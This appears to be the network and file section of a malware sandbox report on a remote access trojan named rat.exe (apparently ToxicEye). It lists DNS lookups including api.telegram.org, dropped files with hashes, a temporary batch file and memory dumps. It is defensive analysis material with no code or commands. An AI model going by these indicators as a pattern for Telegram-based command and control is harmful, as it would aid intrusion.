                                      api.telegram.org
                                      dns
                                      rat.exe
                                      62 B
                                       78 B
                                       1
                                      1

                                      DNS Request

                                      api.telegram.org

                                      DNS Response

                                      149.154.167.220

                                    • 8.8.8.8:53
                                      220.167.154.149.in-addr.arpa
                                      dns
                                      74 B
                                       167 B
                                       1
                                      1

                                      DNS Request

                                      220.167.154.149.in-addr.arpa

                                    • 8.8.8.8:53
                                      149.220.183.52.in-addr.arpa
                                      dns
                                      73 B
                                       147 B
                                       1
                                      1

                                      DNS Request

                                      149.220.183.52.in-addr.arpa

                                    • 8.8.8.8:53
                                      154.239.44.20.in-addr.arpa
                                      dns
                                      72 B
                                       158 B
                                       1
                                      1

                                      DNS Request

                                      154.239.44.20.in-addr.arpa

                                    • 8.8.8.8:53
                                      www.google.com
                                      dns
                                      chrome.exe
                                      60 B
                                       76 B
                                       1
                                      1

                                      DNS Request

                                      www.google.com

                                      DNS Response

                                      142.250.187.196

                                    • 8.8.8.8:53
                                      227.16.217.172.in-addr.arpa
                                      dns
                                      73 B
                                       140 B
                                       1
                                      1

                                      DNS Request

                                      227.16.217.172.in-addr.arpa

                                    • 8.8.8.8:53
                                      53.210.109.20.in-addr.arpa
                                      dns
                                      72 B
                                       158 B
                                       1
                                      1

                                      DNS Request

                                      53.210.109.20.in-addr.arpa

                                    • 8.8.8.8:53
                                      74.204.58.216.in-addr.arpa
                                      dns
                                      72 B
                                       171 B
                                       1
                                      1

                                      DNS Request

                                      74.204.58.216.in-addr.arpa

                                    • 8.8.8.8:53
                                      196.187.250.142.in-addr.arpa
                                      dns
                                      74 B
                                       112 B
                                       1
                                      1

                                      DNS Request

                                      196.187.250.142.in-addr.arpa

                                    • 142.250.187.196:443
                                      www.google.com
                                      https
                                      chrome.exe
                                      3.7kB
                                       10.8kB
                                       12
                                      13
                                    • 8.8.8.8:53
                                      15.164.165.52.in-addr.arpa
                                      dns
                                      72 B
                                       146 B
                                       1
                                      1

                                      DNS Request

                                      15.164.165.52.in-addr.arpa

                                    • 224.0.0.251:5353
                                      chrome.exe
                                      204 B
                                       3
                                    • 8.8.8.8:53
                                      clients2.google.com
                                      dns
                                      chrome.exe
                                      65 B
                                       105 B
                                       1
                                      1

                                      DNS Request

                                      clients2.google.com

                                      DNS Response

                                      142.250.187.238

                                    • 8.8.8.8:53
                                      238.187.250.142.in-addr.arpa
                                      dns
                                      74 B
                                       113 B
                                       1
                                      1

                                      DNS Request

                                      238.187.250.142.in-addr.arpa

                                    • 8.8.8.8:53
                                      clients2.googleusercontent.com
                                      dns
                                      chrome.exe
                                      76 B
                                       121 B
                                       1
                                      1

                                      DNS Request

                                      clients2.googleusercontent.com

                                      DNS Response

                                      142.250.200.33

                                    • 8.8.8.8:53
                                      33.200.250.142.in-addr.arpa
                                      dns
                                      146 B
                                       111 B
                                       2
                                      1

                                      DNS Request

                                      33.200.250.142.in-addr.arpa

                                      DNS Request

                                      33.200.250.142.in-addr.arpa

                                    • 8.8.8.8:53
                                      172.214.232.199.in-addr.arpa
                                      dns
                                      222 B
                                       128 B
                                       3
                                      1

                                      DNS Request

                                      172.214.232.199.in-addr.arpa

                                      DNS Request

                                      172.214.232.199.in-addr.arpa

                                      DNS Request

                                      172.214.232.199.in-addr.arpa

                                    • 8.8.8.8:53
                                      180.129.81.91.in-addr.arpa
                                      dns
                                      72 B
                                       147 B
                                       1
                                      1

                                      DNS Request

                                      180.129.81.91.in-addr.arpa

                                    • 8.8.8.8:53
                                      13.227.111.52.in-addr.arpa
                                      dns
                                      72 B
                                       158 B
                                       1
                                      1

                                      DNS Request

                                      13.227.111.52.in-addr.arpa

                                    MITRE ATT&CK Enterprise v15

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\736b42c9-e636-4cfe-b8f1-f43b40fd9c05.tmp
                                      Filesize

                                      230KB

                                      MD5

                                      4b9ec83b8b8a36a5ff4036ea95d86b5a

                                      SHA1

                                      aaf913de72942e4cf5d284790f3ef98d773a0d42

                                      SHA256

                                      22b0d622529ce8468c33b6425def44e224483bfd5ddce83dec89086c97a71c16

                                      SHA512

                                      6bb248075e54fadca9dd6e985c61eaac2eb33215ce73b4f1986892dbe6d2d94104faed489fcab7cdff3ea152bf54e224270a445a3093521e8469a06f7ee0c1cc

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
                                      Filesize

                                      649B

                                      MD5

                                      f4d7ea01c17d794111254ebec745c02e

                                      SHA1

                                      9ae7e39c99df6550cc36df881bee9bd2d04294e1

                                      SHA256

                                      41a8301f258b9066427ad6413e2c591183a5c636255a2be901e0642978f9d35f

                                      SHA512

                                      26a326a581e4ec9ba18ec81779f384cd2d440323c2ce15931647c666ec145af2e79d81371e3f96955e966306c4d503c10ef1e6ece84e5dce0f8bddce2e7ae698

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.85.1_0\_locales\en\messages.json
                                      Filesize

                                      851B

                                      MD5

                                      07ffbe5f24ca348723ff8c6c488abfb8

                                      SHA1

                                      6dc2851e39b2ee38f88cf5c35a90171dbea5b690

                                      SHA256

                                      6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

                                      SHA512

                                      7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.85.1_0\dasherSettingSchema.json
                                      Filesize

                                      854B

                                      MD5

                                      4ec1df2da46182103d2ffc3b92d20ca5

                                      SHA1

                                      fb9d1ba3710cf31a87165317c6edc110e98994ce

                                      SHA256

                                      6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

                                      SHA512

                                      939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
                                      Filesize

                                      1KB

                                      MD5

                                      a2c068df5aa837a458b2fbef9a98d326

                                      SHA1

                                      78685c2665099345351ebda2e83452bdd4afa537

                                      SHA256

                                      38ec4f0a397cf19cf3838fb828917fff34fc00a41e148ffc52b525c8b2206ac7

                                      SHA512

                                      a415fe800bd7597c83d649b7f77b24b319eef950548eac887084d4451663454036a899e4952b3afa36bc3f28ee9c1c24ddadb652cd4049e0a261713bed229fb6

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
                                      Filesize

                                      2B

                                      MD5

                                      d751713988987e9331980363e24189ce

                                      SHA1

                                      97d170e1550eee4afc0af065b78cda302a97674c

                                      SHA256

                                      4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                      SHA512

                                      b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
                                      Filesize

                                      356B

                                      MD5

                                      63ce24e1f9c6c0c62292e0709a0ba6cc

                                      SHA1

                                      5eb8fdd64c15a82f983d6e1cdd7b56be04e8f94a

                                      SHA256

                                      bf57acd6b101dc972b1378d3efb6edf9caaea837d3d424f9051a125beb1da214

                                      SHA512

                                      7e910e8e4a3aa1099540dbb8a06352d10d6d52dede3f12d65f03fa65f41f4632771fc80b30b7df05350b7aa6d9eedadca11d4a52ec21955c1f9173d46730ad8d

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                      Filesize

                                      9KB

                                      MD5

                                      b1bf17264b82bb9983ed59730c1cefd3

                                      SHA1

                                      206201edd9a89c0c30c5ea839ffa72ee1d457a56

                                      SHA256

                                      905d226ba8869492e2fcb61ec66a1e25d7d7c8f25f27d542225fa9e43d43518a

                                      SHA512

                                      8378033e681279c216371b32d0006a01b162c8191a1eecbba7c344fad0665346c3605ab6db8b19560ec1f7b1a1a02800b23abdc181c323238cff5b97793e6b15

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                      Filesize

                                      9KB

                                      MD5

                                      144b6a7ad82dda4abe03abdd71b66f03

                                      SHA1

                                      16b6c3ee1dfb2438adba3a740ecb9de95db121ee

                                      SHA256

                                      bc13979e47d5b785e81ee8cee3dff8abc8c2bedbc6849352b8b7bcc4ce98e2ca

                                      SHA512

                                      3914124e96ef7c867fba8ee60b666699addf5e44dadfef93b0f21b2727ea2ca2e7d1aa2b6347eba8412d6cf797d3890ea1facd7e1b155c45d7bf434a1eab4255

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                      Filesize

                                      9KB

                                      MD5

                                      5c68d25f0e8c1ce68183573acae1271e

                                      SHA1

                                      90fbaf9300c924e0d3e5a2b079929fdff8764d48

                                      SHA256

                                      6d78afa1f5ab369882644745145da707871a9937c65aa0d7603e6809786f9d30

                                      SHA512

                                      d242234e65ad66b14614f1fa53b0c79647cfc2ce2c138b0994088d241d51005061779bbcb7eac9d6418e9696b73840fbedf0aa16f2dca3b2e325b72c112f5edb

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                      Filesize

                                      9KB

                                      MD5

                                      a1a6542049d41fc2fcc3a93d16f43764

                                      SHA1

                                      b9d4030fcd1ad8aa6deb9a56fd0abd10b704cdca

                                      SHA256

                                      6c347495cc4c1e69eed1893d2ac209708e485412238e92a11fda1942030212fb

                                      SHA512

                                      00f6e1bd1db4c63ce3badea836e365832827e1d42e347ccc35f622010a04d61a66780213a26a42be25406bae76058915b167b4df0583045f32c687c0b12bc6ca

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
                                      Filesize

                                      15KB

                                      MD5

                                      6788a27d120ed75f3f04c0790a9f2aad

                                      SHA1

                                      058b5879fe0920f1a474ddd95fd3f6255337f9db

                                      SHA256

                                      c3827de20c8ab45a5bf237ece77fd83b5bb5194705ee7b131c8d09d58654aeb7

                                      SHA512

                                      56fc206b79eb5db11168e2fe1f0e61dacf2ddbd12f45ffabc46633913fab6037196c28ba93b77f98eee83cdb63bf501104e5366d9c66214213aa1b3fac46b913

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
                                      Filesize

                                      72B

                                      MD5

                                      b0b3a1f782c4f1542ad54d8f4287a87b

                                      SHA1

                                      a5fbe59f4b454c318c5dc5219e69cae089bb2037

                                      SHA256

                                      45fdc831cf1094dca24e9a990738570358605290ff1ca41fe770a5beb4ce888d

                                      SHA512

                                      5d0e1ff415e23b8014f8ba806ba80f7a3e621fdf2284a905ec9e4a3ef0682263c701f9fff3d87c6528bbf9899139ea3a15d9889f71b7eda5a1ab2f45cc621305

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
                                      Filesize

                                      230KB

                                      MD5

                                      852beed959ebe28213136165355c08c6

                                      SHA1

                                      6c6eec40c25563522a28507de997f786f1a0ee06

                                      SHA256

                                      336d89a10b24cb66ab3f9246722c605b503062c0e466f4215013e56c1bbee152

                                      SHA512

                                      a5d11153803ee1e066fc0b78e29de765df7abe7a887133ea7b488b1e32f3064fa1238546b8309e96f2f66082cf8455f9a244a7093b1ca34718b506f1e0025484

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Temp\scoped_dir1800_1789830199\3894ad32-4ef2-4f7d-8f7d-82bcf37fcdea.tmp
                                      Filesize

                                      150KB

                                      MD5

                                      14937b985303ecce4196154a24fc369a

                                      SHA1

                                      ecfe89e11a8d08ce0c8745ff5735d5edad683730

                                      SHA256

                                      71006a5311819fef45c659428944897184880bcdb571bf68c52b3d6ee97682ff

                                      SHA512

                                      1d03c75e4d2cd57eee7b0e93e2de293b41f280c415fb2446ac234fc5afd11fe2f2fcc8ab9843db0847c2ce6bd7df7213fcf249ea71896fbf6c0696e3f5aee46c

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Temp\scoped_dir1800_1789830199\CRX_INSTALL\_locales\en\messages.json
                                      Filesize

                                      711B

                                      MD5

                                      558659936250e03cc14b60ebf648aa09

                                      SHA1

                                      32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825

                                      SHA256

                                      2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b

                                      SHA512

                                      1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Temp\tmpC89F.tmp.bat
                                      Filesize

                                      188B

                                      MD5

                                      9241c9220ee3ab8186ef5186dae0fc35

                                      SHA1

                                      e79bd9f53ba94952425b3edb39cb02ce3b6cf161

                                      SHA256

                                      653abd61e2b7d4c9650518a4d51d26afd2cec47b15a6046121b5166d81154c22

                                      SHA512

                                      93688677b9fda663af906dec13b250ce742d1b9f2326c126a240a7a91e75e80ddb15650cf6a106705d6bd9f408f7ecd19bf7eca4966927ac4cae61d4ccea3137

                                      Download Submit

                                    • C:\Users\ToxicEye\rat.exe
                                      Filesize

                                      111KB

                                      MD5

                                      e3d580a17a351366392ec9e2af674524

                                      SHA1

                                      354e8f441c2fa510e1b3ecab222280649a7efb9a

                                      SHA256

                                      6e644b385d296b76bb3ba68ff006d6b86de763c8b5792e07053e20e3d8218d75

                                      SHA512

                                      a7e2726a2b28a39f6624f419ab9194b4c8e3d4c117e324c2719b3f944c5262cbc064df8989d34b984d8541767327d18381adf6678e4445dc8a49afe0a0824309

                                      Download Submit

                                    • memory/2424-12-0x0000022EAEBA0000-0x0000022EAEC16000-memory.dmp

                                      Filesize

                                      472KB

                                      Download

                                    • memory/2424-11-0x0000022EAEAF0000-0x0000022EAEB9A000-memory.dmp

                                      Filesize

                                      680KB

                                      Download

                                    • memory/2696-0-0x00007FF8563B3000-0x00007FF8563B5000-memory.dmp

                                      Filesize

                                      8KB

                                      Download

                                    • memory/2696-6-0x00007FF8563B0000-0x00007FF856E71000-memory.dmp

                                      Filesize

                                      10.8MB

                                      Download

                                    • memory/2696-2-0x00007FF8563B0000-0x00007FF856E71000-memory.dmp

                                      Filesize

                                      10.8MB

                                      Download

                                    • memory/2696-1-0x000001C400790000-0x000001C4007B2000-memory.dmp

                                      Filesize

                                      136KB

                                      Download

                                    We care about your privacy.

                                    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.